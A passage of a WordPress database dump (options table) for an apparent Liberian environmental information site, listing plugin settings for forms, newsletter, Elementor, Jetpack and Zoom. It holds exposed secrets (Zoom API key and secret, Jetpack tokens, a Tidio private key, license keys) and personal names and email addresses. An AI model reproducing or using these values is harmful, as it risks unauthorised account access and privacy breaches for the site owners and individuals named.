number.','yes'),(29664,'everest_forms_default_form_page_id','2889','yes'),(29669,'everest_forms_activated','1574903926','yes'),(29684,'everest_forms_admin_notices','a:4:{i:0;s:6:\"review\";i:1;s:6:\"survey\";i:2;s:11:\"allow_usage\";i:3;s:15:\"php_deprecation\";}','yes'),(29686,'everest_forms_review','a:2:{s:4:\"time\";i:1576155191;s:9:\"dismissed\";b:1;}','yes'),(33077,'jet-license-data','a:1:{s:12:\"license-list\";a:1:{s:32:\"4068c51d4087177d55d0a92bac29d376\";a:3:{s:13:\"licenseStatus\";s:7:\"expired\";s:10:\"licenseKey\";s:32:\"4068c51d4087177d55d0a92bac29d376\";s:14:\"licenseDetails\";a:12:{s:7:\"license\";s:32:\"4068c51d4087177d55d0a92bac29d376\";s:4:\"type\";s:10:\"crocoblock\";s:12:\"product_name\";s:31:\"Custom Subscription Single Site\";s:12:\"product_slug\";s:31:\"custom-subscription-single-site\";s:16:\"product_category\";s:10:\"plugin-set\";s:6:\"expire\";s:19:\"2023-10-12 23:59:59\";s:16:\"activation_limit\";i:1;s:7:\"plugins\";a:3:{s:21:\"jet-blog/jet-blog.php\";a:8:{s:4:\"name\";s:7:\"JetBlog\";s:4:\"slug\";s:21:\"jet-blog/jet-blog.php\";s:7:\"version\";s:5:\"2.3.1\";s:5:\"thumb\";s:71:\"https://account.crocoblock.com/free-download/images/jetlogo/jetblog.svg\";s:9:\"thumb_alt\";s:75:\"https://account.crocoblock.com/free-download/images/jetlogo-alt/jetblog.svg\";s:4:\"docs\";s:64:\"https://crocoblock.com/knowledge-base/article-category/jet-blog/\";s:4:\"demo\";s:39:\"https://crocoblock.com/plugins/jetblog/\";s:4:\"desc\";s:26:\"Create engaging blog pages\";}s:39:\"jet-smart-filters/jet-smart-filters.php\";a:8:{s:4:\"name\";s:15:\"JetSmartFilters\";s:4:\"slug\";s:39:\"jet-smart-filters/jet-smart-filters.php\";s:7:\"version\";s:5:\"3.0.0\";s:5:\"thumb\";s:79:\"https://account.crocoblock.com/free-download/images/jetlogo/jetsmartfilters.svg\";s:9:\"thumb_alt\";s:83:\"https://account.crocoblock.com/free-download/images/jetlogo-alt/jetsmartfilters.svg\";s:4:\"docs\";s:71:\"https://crocoblock.com/knowledge-base/article-category/jetsmartfilters/\";s:4:\"demo\";s:47:\"https://crocoblock.com/plugins/jetsmartfilters/\";s:4:\"desc\";s:34:\"Advanced filters for any post type\";}s:25:\"jet-search/jet-search.php\";a:8:{s:4:\"name\";s:9:\"JetSearch\";s:4:\"slug\";s:25:\"jet-search/jet-search.php\";s:7:\"version\";s:5:\"3.0.2\";s:5:\"thumb\";s:73:\"https://account.crocoblock.com/free-download/images/jetlogo/jetsearch.svg\";s:9:\"thumb_alt\";s:77:\"https://account.crocoblock.com/free-download/images/jetlogo-alt/jetsearch.svg\";s:4:\"docs\";s:66:\"https://crocoblock.com/knowledge-base/article-category/jet-search/\";s:4:\"demo\";s:41:\"https://crocoblock.com/plugins/jetsearch/\";s:4:\"desc\";s:27:\"Try the fastest AJAX search\";}}s:5:\"sites\";a:1:{i:0;s:17:\"ekmsliberia.info/\";}s:11:\"permissions\";a:2:{s:13:\"update_plugin\";b:1;s:14:\"install_plugin\";b:1;}s:20:\"has_templates_access\";b:0;s:27:\"has_design_templates_access\";b:0;}}}}','yes'),(33102,'recovery_mode_email_last_sent','1666082775','yes'),(33129,'jp_sync_lock_full_sync_enqueue','1607349853.4068','yes'),(33188,'newsletter_logger_secret','dc01b950','yes'),(33191,'newsletter_main','a:37:{s:11:\"return_path\";b:0;s:8:\"reply_to\";b:0;s:12:\"sender_email\";s:24:\"contact@ekmsliberia.info\";s:11:\"sender_name\";s:23:\"Liberia EKMS Newsletter\";s:6:\"editor\";i:0;s:13:\"scheduler_max\";s:5:\"10000\";s:9:\"phpmailer\";i:0;s:5:\"debug\";s:1:\"0\";s:5:\"track\";s:1:\"1\";s:3:\"css\";s:0:\"\";s:12:\"css_disabled\";s:1:\"0\";s:2:\"ip\";s:0:\"\";s:4:\"page\";s:4:\"2904\";s:19:\"disable_cron_notice\";i:0;s:13:\"do_shortcodes\";s:1:\"0\";s:11:\"header_logo\";a:2:{s:2:\"id\";s:3:\"440\";s:3:\"url\";s:60:\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal.png\";}s:12:\"header_title\";s:41:\"Environmental Knowledge Management System\";s:10:\"header_sub\";s:19:\"Republic of Liberia\";s:12:\"footer_title\";s:12:\"EKMS Liberia\";s:14:\"footer_contact\";s:37:\"4th Street, Sinkor, Monrovia, Liberia\";s:12:\"footer_legal\";s:0:\"\";s:12:\"facebook_url\";s:85:\"https://web.facebook.com/pg/Environmental-Knowledge-Management-System-108459580598172\";s:11:\"twitter_url\";s:31:\"https://twitter.com/ekmsliberia\";s:13:\"instagram_url\";s:0:\"\";s:13:\"pinterest_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:10:\"tumblr_url\";s:0:\"\";s:11:\"youtube_url\";s:0:\"\";s:9:\"vimeo_url\";s:0:\"\";s:14:\"soundcloud_url\";s:0:\"\";s:12:\"telegram_url\";s:0:\"\";s:6:\"vk_url\";s:0:\"\";s:14:\"googleplus_url\";s:0:\"\";s:12:\"contract_key\";s:0:\"\";s:9:\"log_level\";s:1:\"0\";s:25:\"content_transfer_encoding\";s:0:\"\";s:5:\"roles\";a:0:{}}','yes'),(33200,'newsletter_profile','a:10:{s:4:\"text\";s:188:\"{profile_form}\n    <p>If you change your email address, a confirmation email will be sent to activate it.</p>\n    <p><a href=\"{unsubscription_confirm_url}\">Cancel your subscription</a></p>\";s:13:\"email_changed\";s:81:\"Your email has been changed, an activation email has been sent with instructions.\";s:5:\"error\";s:42:\"Your email is not valid or already in use.\";s:10:\"save_label\";s:4:\"Save\";s:13:\"privacy_label\";s:21:\"Read our privacy note\";s:5:\"saved\";s:14:\"Profile saved.\";s:18:\"export_newsletters\";i:0;s:3:\"url\";s:0:\"\";s:5:\"lists\";a:0:{}s:12:\"customfields\";a:0:{}}','yes'),(33203,'newsletter_unsubscription','a:8:{s:16:\"unsubscribe_text\";s:103:\"<p>Please confirm you want to unsubscribe <a href=\"{unsubscription_confirm_url}\">clicking here</a>.</p>\";s:10:\"error_text\";s:99:\"<p>Subscriber not found, it probably has already been removed. No further actions are required.</p>\";s:17:\"unsubscribed_text\";s:124:\"<p>Your subscription has been deleted. If that was an error you can <a href=\"{reactivate_url}\">subscribe again here</a>.</p>\";s:20:\"unsubscribed_subject\";s:7:\"Goodbye\";s:20:\"unsubscribed_message\";s:87:\"<p>This message confirms that you have unsubscribed from our newsletter. Thank you.</p>\";s:16:\"reactivated_text\";s:46:\"<p>Your subscription has been reactivated.</p>\";s:6:\"notify\";s:0:\"\";s:12:\"notify_email\";s:0:\"\";}','yes'),(33209,'newsletter_emails','a:1:{s:5:\"theme\";s:7:\"default\";}','yes'),(33210,'newsletter_emails_theme_default','a:0:{}','no'),(33213,'newsletter_users','a:0:{}','yes'),(33216,'newsletter_statistics','a:1:{s:3:\"key\";s:32:\"3e00f6b7ad514de0ee66dbc9f56651eb\";}','yes'),(33218,'newsletter_install_time','1575385711','no'),(33229,'widget_newsletterwidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(33230,'widget_newsletterwidgetminimal','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(33235,'newsletter_page','2904','no'),(33242,'newsletter_diagnostic_cron_calls','a:100:{i:0;i:1782101280;i:1;i:1782101312;i:2;i:1782101494;i:3;i:1782101579;i:4;i:1782101611;i:5;i:1782101795;i:6;i:1782101875;i:7;i:1782101912;i:8;i:1782102093;i:9;i:1782102178;i:10;i:1782102210;i:11;i:1782102396;i:12;i:1782102477;i:13;i:1782102487;i:14;i:1782102508;i:15;i:1782102693;i:16;i:1782102775;i:17;i:1782102811;i:18;i:1782102993;i:19;i:1782103079;i:20;i:1782103110;i:21;i:1782103292;i:22;i:1782103378;i:23;i:1782103410;i:24;i:1782103442;i:25;i:1782103485;i:26;i:1782103601;i:27;i:1782103710;i:28;i:1782103986;i:29;i:1782104070;i:30;i:1782104198;i:31;i:1782104296;i:32;i:1782104338;i:33;i:1782104488;i:34;i:1782104574;i:35;i:1782104604;i:36;i:1782104799;i:37;i:1782104889;i:38;i:1782104913;i:39;i:1782105094;i:40;i:1782105180;i:41;i:1782105209;i:42;i:1782105392;i:43;i:1782105474;i:44;i:1782105510;i:45;i:1782105688;i:46;i:1782105689;i:47;i:1782105777;i:48;i:1782105809;i:49;i:1782105990;i:50;i:1782106076;i:51;i:1782106088;i:52;i:1782106105;i:53;i:1782106289;i:54;i:1782106374;i:55;i:1782106406;i:56;i:1782106588;i:57;i:1782106678;i:58;i:1782106710;i:59;i:1782106897;i:60;i:1782106983;i:61;i:1782107005;i:62;i:1782107189;i:63;i:1782107190;i:64;i:1782107275;i:65;i:1782107309;i:66;i:1782107491;i:67;i:1782107671;i:68;i:1782107839;i:69;i:1782107876;i:70;i:1782107908;i:71;i:1782108122;i:72;i:1782108202;i:73;i:1782108205;i:74;i:1782108391;i:75;i:1782108475;i:76;i:1782108506;i:77;i:1782108697;i:78;i:1782108777;i:79;i:1782108804;i:80;i:1782109010;i:81;i:1782109082;i:82;i:1782109103;i:83;i:1782109296;i:84;i:1782109381;i:85;i:1782109413;i:86;i:1782109588;i:87;i:1782109680;i:88;i:1782109691;i:89;i:1782109712;i:90;i:1782109925;i:91;i:1782110070;i:92;i:1782110200;i:93;i:1782110330;i:94;i:1782110493;i:95;i:1782110576;i:96;i:1782110605;i:97;i:1782110804;i:98;i:1782110899;i:99;i:1782110920;}','off'),(33243,'newsletter_diagnostic_cron_data','a:3:{s:4:\"mean\";d:212.93999999999999772626324556767940521240234375;s:3:\"max\";i:602;s:3:\"min\";i:4;}','no'),(34327,'newsletter_log_level','0','yes'),(35847,'dnh_dismissed_notices','a:1:{i:0;s:24:\"wrm_1e278f4992d8bb3f1f0b\";}','yes'),(36672,'newsletter_dismissed','a:1:{s:20:\"newsletter-shortcode\";i:1;}','yes'),(36934,'newsletter_users_search','a:4:{s:11:\"search_text\";s:0:\"\";s:13:\"search_status\";s:0:\"\";s:11:\"search_list\";s:0:\"\";s:11:\"search_page\";i:0;}','yes'),(40749,'duplicate_post_show_original_column','0','yes'),(40750,'duplicate_post_show_original_in_post_states','0','yes'),(40751,'duplicate_post_show_original_meta_box','0','yes'),(77116,'post_by_email_address38','NULL','yes'),(86974,'iclcat_212','a:1:{s:5:\"small\";s:4:\"2963\";}','yes'),(87021,'institutions_category_children','a:0:{}','yes'),(89691,'_elementor_editor_upgrade_notice_dismissed','1625686988','yes'),(90887,'evf_validation_error','yes','yes'),(197474,'_zvc_user_lists','a:1:{i:0;O:8:\"stdClass\":15:{s:2:\"id\";s:22:\"paakOHQmS7mGZ2q9VhT-8A\";s:10:\"first_name\";s:10:\"Elvina Joy\";s:9:\"last_name\";s:7:\"Samuels\";s:5:\"email\";s:25:\"elvinasamuels61@gmail.com\";s:4:\"type\";i:1;s:3:\"pmi\";i:3236440875;s:8:\"timezone\";s:18:\"Atlantic/Reykjavik\";s:8:\"verified\";i:1;s:10:\"created_at\";s:20:\"2021-03-19T12:42:28Z\";s:15:\"last_login_time\";s:20:\"2021-03-23T11:56:09Z\";s:19:\"last_client_version\";s:19:\"5.5.13142.0301(win)\";s:8:\"language\";s:5:\"en-US\";s:12:\"phone_number\";s:0:\"\";s:6:\"status\";s:6:\"active\";s:7:\"role_id\";s:1:\"0\";}}','yes'),(197846,'eroom_installed','1592007220','yes'),(373533,'wpp_performance_nag','a:2:{s:6:\"status\";i:0;s:12:\"last_checked\";N;}','yes'),(373874,'jet_is_modify_tm_license_data','true','yes'),(373956,'everest_forms_confirm_validation','Field values do not match.','yes'),(373957,'everest_forms_check_limit_validation','You have exceeded number of allowed selections: {#}.','yes'),(373989,'elementor_active_kit','3170','yes'),(373991,'elementor_install_history','a:13:{s:6:\"3.0.12\";i:1603292473;s:6:\"3.0.13\";i:1605180665;s:6:\"3.0.14\";i:1607349743;s:6:\"3.0.15\";i:1609757433;s:6:\"3.0.16\";i:1610458319;s:5:\"3.3.1\";i:1629078569;s:5:\"3.3.6\";i:1655127104;s:5:\"3.4.0\";i:1629133873;s:5:\"3.4.1\";i:1629374352;s:5:\"3.4.3\";i:1631059510;s:5:\"3.6.6\";i:1655138274;s:5:\"3.7.1\";i:1666082319;s:5:\"3.7.8\";i:1666082320;}','yes'),(374056,'_ca_condition_type_cache','a:1:{s:7:\"sidebar\";a:2:{i:0;s:9:\"post_type\";i:1;s:8:\"taxonomy\";}}','yes'),(374172,'barn2_plugin_license_8381','a:6:{s:7:\"license\";s:32:\"b05cd1abcb303d594228018d84564150\";s:6:\"status\";s:7:\"expired\";s:3:\"url\";s:16:\"ekmsliberia.info\";s:10:\"error_code\";s:7:\"expired\";s:13:\"error_message\";s:0:\"\";s:12:\"license_info\";a:10:{s:7:\"item_id\";i:8381;s:9:\"item_name\";s:15:\"Posts Table Pro\";s:7:\"expires\";s:19:\"2020-10-26 23:59:59\";s:10:\"payment_id\";i:150898;s:13:\"customer_name\";s:15:\"Darius Barrolle\";s:14:\"customer_email\";s:24:\"librollers2013@gmail.com\";s:13:\"license_limit\";i:2;s:10:\"site_count\";i:1;s:16:\"activations_left\";i:1;s:8:\"price_id\";s:1:\"1\";}}','no'),(417346,'jivosite_plugin_version','1.3.5.3','yes'),(417354,'jivosite_widget_id','ct3NXU2OvN','yes'),(417355,'jivosite_token','9e7cdcfc6548dffa71e7b5d4ecc507f3','yes'),(417356,'jivosite_lang_code','en_US','yes'),(419138,'_zvc_user_lists_expiry_time','1617287550','yes'),(419874,'disallowed_keys','','no'),(419875,'comment_previously_approved','1','yes'),(419876,'auto_plugin_theme_update_emails','a:1:{s:21:\"jet-blog/jet-blog.php\";s:6:\"2.2.17\";}','no'),(419877,'finished_updating_comment_type','1','yes'),(420207,'widget_wisechatwidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(420208,'widget_wisechatwidgetchannelusers','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(420300,'tidio-async-load','1','yes'),(420320,'tidio-one-private-key','qkanj7bt2vxyic0hbiqcfkve0psjoq3w','yes'),(420321,'tidio-one-public-key','xprydm7nf7iqgxesd5jupz5jdidaihcf','yes'),(439041,'jetpack_connection_active_plugins','a:2:{s:7:\"jetpack\";a:1:{s:4:\"name\";s:7:\"Jetpack\";}s:15:\"jetpack-protect\";a:2:{s:4:\"name\";s:15:\"Jetpack Protect\";s:8:\"url_info\";s:35:\"https://jetpack.com/jetpack-protect\";}}','yes'),(498265,'duplicate_post_show_link','a:3:{s:9:\"new_draft\";s:1:\"1\";s:5:\"clone\";s:1:\"1\";s:17:\"rewrite_republish\";s:1:\"1\";}','yes'),(498266,'duplicate_post_show_link_in','a:4:{s:3:\"row\";s:1:\"1\";s:8:\"adminbar\";s:1:\"1\";s:9:\"submitbox\";s:1:\"1\";s:11:\"bulkactions\";s:1:\"1\";}','yes'),(552170,'post_views_counter_activation_date','1612959272','yes'),(586892,'auto_update_plugins','a:2:{i:0;s:19:\"akismet/akismet.php\";i:1;s:74:\"maintenance-coming-soon-redirect-animation/wploti_maintenance_redirect.php\";}','no'),(613829,'zoom_api_key','cwe_rEwQQ6KQ3y8ets_O7g','yes'),(613830,'zoom_api_secret','YydApxn9bRy7lz9i2VQFAEHPDL33Rhoy14NV','yes'),(613831,'zoom_vanity_url','','yes'),(613832,'zoom_past_join_links','','yes'),(613833,'zoom_show_author','','yes'),(613834,'zoom_started_meeting_text','','yes'),(613835,'zoom_going_tostart_meeting_text','','yes'),(613836,'zoom_ended_meeting_text','','yes'),(613837,'zoom_api_date_time_format','LLLL','yes'),(613838,'zoom_api_custom_date_time_format','','yes'),(613839,'zoom_api_full_month_format','','yes'),(613840,'zoom_api_twenty_fourhour_format','','yes'),(613841,'zoom_api_embed_pwd_join_link','','yes'),(613842,'zoom_api_hide_shortcode_join_links','','yes'),(613843,'zoom_api_hide_in_jvb','','yes'),(613844,'vczapi_disable_invite','','yes'),(613845,'zoom_api_disable_jvb','','yes'),(613846,'zoom_api_default_lang_jvb','all','yes'),(788328,'post_by_email_address42','NULL','yes'),(798854,'everest_forms_enable_log','no','yes'),(859478,'fm_key','QpidWcalseZ5y83ONfgunXCtr','yes'),(859485,'filemanager_email_verified_38','yes','yes'),(865389,'wsmKeepData','1','yes'),(865390,'wsm_tables','a:16:{s:7:\"LOG_URL\";s:8:\"_url_log\";s:10:\"LOG_UNIQUE\";s:15:\"_logUniqueVisit\";s:9:\"LOG_VISIT\";s:9:\"_logVisit\";s:2:\"OS\";s:9:\"_oSystems\";s:4:\"BROW\";s:9:\"_browsers\";s:4:\"TOOL\";s:9:\"_toolBars\";s:2:\"SE\";s:14:\"_searchEngines\";s:2:\"RG\";s:8:\"_regions\";s:4:\"RSOL\";s:12:\"_resolutions\";s:7:\"COUNTRY\";s:10:\"_countries\";s:3:\"DHR\";s:18:\"_dailyHourlyReport\";s:3:\"MDR\";s:19:\"_monthlyDailyReport\";s:3:\"YMR\";s:20:\"_yearlyMonthlyReport\";s:3:\"DWR\";s:16:\"_datewise_report\";s:3:\"MWR\";s:17:\"_monthwise_report\";s:3:\"YWR\";s:16:\"_yearwise_report\";}','yes'),(865391,'wsm_dailyReportedTime','2021-08-17','yes'),(865403,'wsmAdminColors','O:8:\"stdClass\":4:{s:4:\"name\";s:7:\"Default\";s:3:\"url\";b:0;s:6:\"colors\";a:4:{i:0;s:7:\"#1d2327\";i:1;s:7:\"#2c3338\";i:2;s:7:\"#2271b1\";i:3;s:7:\"#72aee6\";}s:11:\"icon_colors\";a:3:{s:4:\"base\";s:7:\"#a7aaad\";s:5:\"focus\";s:7:\"#72aee6\";s:7:\"current\";s:4:\"#fff\";}}','yes'),(865404,'wsm_free_active_time','1628771657','no'),(865407,'wsm_popup_status','1','yes'),(865463,'wsm_lastHitTime','2021-08-17 14:30:40','yes'),(866714,'Schedule_time','2021-08-16','yes'),(871621,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(871623,'https_detection_errors','a:0:{}','off'),(871628,'ai1wmue_plugin_key','28a71997-f345-40f8-9587-4125c12ffbc5','yes'),(871637,'swift_performance_plugin_organizer','a:0:{}','yes'),(871702,'auto_update_core_dev','enabled','yes'),(871703,'auto_update_core_minor','enabled','yes'),(871704,'auto_update_core_major','unset','yes'),(871705,'wp_force_deactivated_plugins','a:0:{}','off'),(871898,'duplicate_post_version','4.1.2','yes'),(871951,'elementor_pro_license_key','activated','yes'),(871952,'_elementor_pro_license_data','a:2:{s:7:\"timeout\";i:1782154140;s:5:\"value\";s:73:\"{\"license\":\"valid\",\"expires\":\"01.01.2030\",\"features\":{\"pro_trial\":false}}\";}','no'),(871953,'elementor_pro_version','3.7.7','yes'),(871954,'widget_elementor-library','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(871955,'_elementor_pro_installed_time','1629078569','yes'),(871956,'_elementor_pro_api_requests_lock','a:2:{s:11:\"get_version\";i:1781025107;s:16:\"get_license_data\";i:1670694530;}','yes'),(871963,'elementor_submissions_db_version','5','yes'),(871974,'everest_forms_queue_flush_rewrite_rules','no','yes'),(871977,'elementor_fonts_manager_font_types','a:0:{}','yes'),(871978,'elementor_fonts_manager_fonts','a:0:{}','yes'),(871979,'elementor_custom_icon_sets_config','a:0:{}','yes'),(872075,'elementor_pro_theme_builder_conditions','a:3:{s:6:\"single\";a:5:{i:4918;a:1:{i:0;s:27:\"include/singular/university\";}i:4138;a:1:{i:0;s:30:\"include/singular/ekms_bulletin\";}i:4088;a:2:{i:0;s:30:\"include/singular/related_topic\";i:1;s:29:\"include/singular/mea_resource\";}i:4054;a:1:{i:0;s:25:\"include/singular/document\";}i:3901;a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}}s:6:\"footer\";a:1:{i:3805;a:1:{i:0;s:15:\"include/general\";}}s:6:\"header\";a:1:{i:3800;a:1:{i:0;s:15:\"include/general\";}}}','yes'),(872575,'jet-tabs-db-version','2.1.13','yes'),(872626,'elecs-license-key','8E523D1F-607C4C85-A3C1E9BF-FB3FE3C3','yes'),(873133,'active_plugins','a:27:{i:0;s:19:\"akismet/akismet.php\";i:1;s:91:\"all-in-one-wp-migration-unlimited-extension/all-in-one-wp-migration-unlimited-extension.php\";i:2;s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";i:3;s:33:\"bit-social-pro/bit-social-pro.php\";i:4;s:25:\"bit-social/bit-social.php\";i:5;s:39:\"button-contact-vr/button-contact-vr.php\";i:6;s:57:\"category-subcategory-list-widget/category-list-widget.php\";i:7;s:49:\"content-aware-sidebars/content-aware-sidebars.php\";i:8;s:58:\"easy-maintenance-mode-by-wpkoder/easy-maintenance-mode.php\";i:9;s:43:\"ele-custom-skin-pro/ele-custom-skin-pro.php\";i:10;s:35:\"ele-custom-skin/ele-custom-skin.php\";i:11;s:31:\"elementor-pro/elementor-pro.php\";i:12;s:23:\"elementor/elementor.php\";i:13;s:31:\"everest-forms/everest-forms.php\";i:14;s:25:\"gtranslate/gtranslate.php\";i:15;s:59:\"intuitive-custom-post-order/intuitive-custom-post-order.php\";i:16;s:21:\"jet-blog/jet-blog.php\";i:17;s:29:\"jet-elements/jet-elements.php\";i:18;s:25:\"jet-search/jet-search.php\";i:19;s:39:\"jet-smart-filters/jet-smart-filters.php\";i:20;s:35:\"jetpack-protect/jetpack-protect.php\";i:21;s:19:\"jetpack/jetpack.php\";i:22;s:21:\"newsletter/plugin.php\";i:23;s:51:\"ocean-elementor-widgets/ocean-elementor-widgets.php\";i:24;s:13:\"pods/init.php\";i:25;s:41:\"post-views-counter/post-views-counter.php\";i:26;s:51:\"wordpress-popular-posts/wordpress-popular-posts.php\";}','yes'),(873134,'template','kava','yes'),(873135,'stylesheet','kava-child','yes'),(873458,'jetpack_activated','4','yes'),(873461,'jetpack_activation_source','a:2:{i:0;s:7:\"unknown\";i:1;N;}','yes'),(873463,'jetpack_options','a:15:{s:11:\"old_version\";s:17:\"12.0.1:1685465109\";s:2:\"id\";i:169463498;s:6:\"public\";i:1;s:30:\"recommendations_banner_enabled\";b:0;s:9:\"hide_jitm\";a:5:{s:3:\"cdn\";a:2:{s:14:\"last_dismissal\";i:1629227810;s:6:\"number\";i:1;}s:8:\"jpmobile\";a:2:{s:14:\"last_dismissal\";i:1629227892;s:6:\"number\";i:1;}s:4:\"scan\";a:2:{s:14:\"last_dismissal\";i:1641289009;s:6:\"number\";i:2;}s:6:\"backup\";a:2:{s:14:\"last_dismissal\";i:1666082592;s:6:\"number\";i:1;}s:8:\"agencies\";a:2:{s:14:\"last_dismissal\";i:1674211329;s:6:\"number\";i:1;}}s:16:\"first_admin_view\";b:1;s:14:\"last_heartbeat\";i:1782037675;s:7:\"version\";s:17:\"12.0.2:1728924455\";s:27:\"recommendations_conditional\";a:3:{i:0;s:7:\"protect\";i:1;s:9:\"publicize\";i:2;s:11:\"backup-plan\";}s:20:\"recommendations_data\";a:7:{s:23:\"selectedRecommendations\";a:2:{i:0;s:7:\"protect\";i:1;s:16:\"site-accelerator\";}s:22:\"skippedRecommendations\";a:0:{}s:21:\"viewedRecommendations\";a:7:{i:0;s:7:\"protect\";i:1;s:7:\"summary\";i:2;s:17:\"welcome__security\";i:3;s:16:\"backup-activated\";i:4;s:14:\"scan-activated\";i:5;s:16:\"site-accelerator\";i:6;s:18:\"server-credentials\";}s:16:\"onboardingActive\";N;s:16:\"onboardingViewed\";a:1:{i:0;s:16:\"JETPACK_SECURITY\";}s:20:\"onboardingHasStarted\";b:1;s:20:\"onboardingTotalSteps\";a:6:{i:0;s:17:\"welcome__security\";i:1;s:16:\"backup-activated\";i:2;s:14:\"scan-activated\";i:3;s:18:\"antispam-activated\";i:4;s:16:\"site-accelerator\";i:5;s:18:\"server-credentials\";}}s:20:\"recommendations_step\";s:18:\"server-credentials\";s:28:\"fallback_no_verify_ssl_certs\";i:0;s:9:\"time_diff\";i:0;s:11:\"master_user\";i:38;s:35:\"licensing_activation_notice_dismiss\";a:2:{s:19:\"last_detached_count\";i:0;s:19:\"last_dismissed_time\";s:25:\"2022-10-18T09:28:39+00:00\";}}','yes'),(873471,'jetpack_available_modules','a:1:{s:6:\"12.0.2\";a:46:{s:10:\"action-bar\";s:4:\"11.4\";s:8:\"carousel\";s:3:\"1.5\";s:13:\"comment-likes\";s:3:\"5.1\";s:8:\"comments\";s:3:\"1.4\";s:12:\"contact-form\";s:3:\"1.3\";s:9:\"copy-post\";s:3:\"7.0\";s:20:\"custom-content-types\";s:3:\"3.1\";s:10:\"custom-css\";s:3:\"1.7\";s:21:\"enhanced-distribution\";s:3:\"1.2\";s:16:\"google-analytics\";s:3:\"4.5\";s:12:\"google-fonts\";s:6:\"10.8.0\";s:19:\"gravatar-hovercards\";s:3:\"1.1\";s:15:\"infinite-scroll\";s:3:\"2.0\";s:8:\"json-api\";s:3:\"1.9\";s:5:\"latex\";s:3:\"1.1\";s:11:\"lazy-images\";s:5:\"5.6.0\";s:5:\"likes\";s:3:\"2.2\";s:8:\"markdown\";s:3:\"2.8\";s:9:\"masterbar\";s:3:\"4.8\";s:7:\"monitor\";s:3:\"2.6\";s:5:\"notes\";s:3:\"1.9\";s:10:\"photon-cdn\";s:3:\"6.6\";s:6:\"photon\";s:3:\"2.0\";s:13:\"post-by-email\";s:3:\"2.0\";s:9:\"post-list\";s:4:\"11.3\";s:7:\"protect\";s:3:\"3.4\";s:9:\"publicize\";s:3:\"2.0\";s:13:\"related-posts\";s:3:\"2.9\";s:6:\"search\";s:3:\"5.0\";s:9:\"seo-tools\";s:3:\"4.4\";s:10:\"sharedaddy\";s:3:\"1.1\";s:10:\"shortcodes\";s:3:\"1.1\";s:10:\"shortlinks\";s:3:\"1.1\";s:8:\"sitemaps\";s:3:\"3.9\";s:3:\"sso\";s:3:\"2.6\";s:5:\"stats\";s:3:\"1.1\";s:13:\"subscriptions\";s:3:\"1.2\";s:13:\"tiled-gallery\";s:3:\"2.1\";s:10:\"vaultpress\";s:5:\"0:1.2\";s:18:\"verification-tools\";s:3:\"3.0\";s:10:\"videopress\";s:3:\"2.5\";s:3:\"waf\";s:4:\"10.9\";s:17:\"widget-visibility\";s:3:\"2.4\";s:7:\"widgets\";s:3:\"1.2\";s:21:\"woocommerce-analytics\";s:3:\"8.4\";s:7:\"wordads\";s:5:\"4.5.0\";}}','yes'),(873472,'jetpack_tos_agreed','1','yes'),(873478,'jetpack_private_options','a:2:{s:10:\"blog_token\";s:65:\"$CKeoM4$zttcc9!D)!t1TVi^yxTAB&le.5pQFsORTPK@emv92hOSaJBCAgT1)!RlW\";s:11:\"user_tokens\";a:2:{i:38;s:68:\"x2l)uN5ImTzKvhVo0t6so5u(wiSeuOU^.Fx*RHqY@wy2pD6)kpTpAf17&b1RrZ8r4.38\";i:42;s:68:\"cH4qT73ixblPJwm9v0wdsGFLkpOqdEga.jzx@lMjZAhonbEW#wk6bI5EmjmRb$I!7.42\";}}','yes'),(873479,'jetpack_active_modules','a:9:{i:0;s:12:\"contact-form\";i:1;s:21:\"enhanced-distribution\";i:2;s:8:\"json-api\";i:3;s:5:\"stats\";i:4;s:18:\"verification-tools\";i:5;s:21:\"woocommerce-analytics\";i:6;s:5:\"notes\";i:7;s:7:\"protect\";i:8;s:7:\"monitor\";}','yes'),(873480,'jetpack_unique_registrations','3','yes'),(873538,'jetpack_testimonial','0','yes'),(873542,'jp_sync_lock_full_sync','','no'),(873547,'jp_sync_retry_after_immediate-send','1670860553.1767','no'),(873548,'stats_options','a:7:{s:9:\"admin_bar\";b:1;s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:11:\"count_roles\";a:0:{}s:7:\"blog_id\";i:169463498;s:12:\"do_not_track\";b:1;s:10:\"hide_smile\";b:1;s:7:\"version\";s:1:\"9\";}','yes'),(873634,'jetpack_sync_health_status','a:2:{s:6:\"status\";s:7:\"in_sync\";s:9:\"timestamp\";d:1656827663.356914997100830078125;}','yes'),(873635,'jetpack_unique_connection','a:3:{s:9:\"connected\";i:5;s:12:\"disconnected\";i:3;s:7:\"version\";s:5:\"3.6.1\";}','yes'),(873644,'jetpack_protect_key','679e913fedc16f40a9177929e195f367d2ab2b0f','no'),(873647,'jetpack_protect_blocked_attempts','1671441','off'),(873650,'jetpack_active_modules_initialized','1','yes'),(873661,'jetpack_active_plan','a:11:{s:10:\"product_id\";i:2002;s:12:\"product_slug\";s:12:\"jetpack_free\";s:12:\"product_name\";s:12:\"Jetpack Free\";s:18:\"product_name_short\";s:4:\"Free\";s:7:\"expired\";b:0;s:14:\"billing_period\";s:0:\"\";s:13:\"user_is_owner\";b:0;s:7:\"is_free\";b:1;s:11:\"license_key\";s:0:\"\";s:15:\"subscribed_date\";s:0:\"\";s:8:\"features\";a:2:{s:6:\"active\";a:21:{i:0;s:12:\"advanced-seo\";i:1;s:3:\"cdn\";i:2;s:9:\"donations\";i:3;s:13:\"form-webhooks\";i:4;s:14:\"multistep-form\";i:5;s:17:\"form-integrations\";i:6;s:14:\"install-themes\";i:7;s:17:\"jetpack-dashboard\";i:8;s:15:\"payment-buttons\";i:9;s:22:\"paypal-payment-buttons\";i:10;s:10:\"podcasting\";i:11;s:18:\"recurring-payments\";i:12;s:11:\"republicize\";i:13;s:17:\"security-settings\";i:14;s:17:\"seo-preview-tools\";i:15;s:14:\"send-a-message\";i:16;s:18:\"social-shares-1000\";i:17;s:18:\"upload-audio-files\";i:18;s:18:\"upload-video-files\";i:19;s:15:\"wha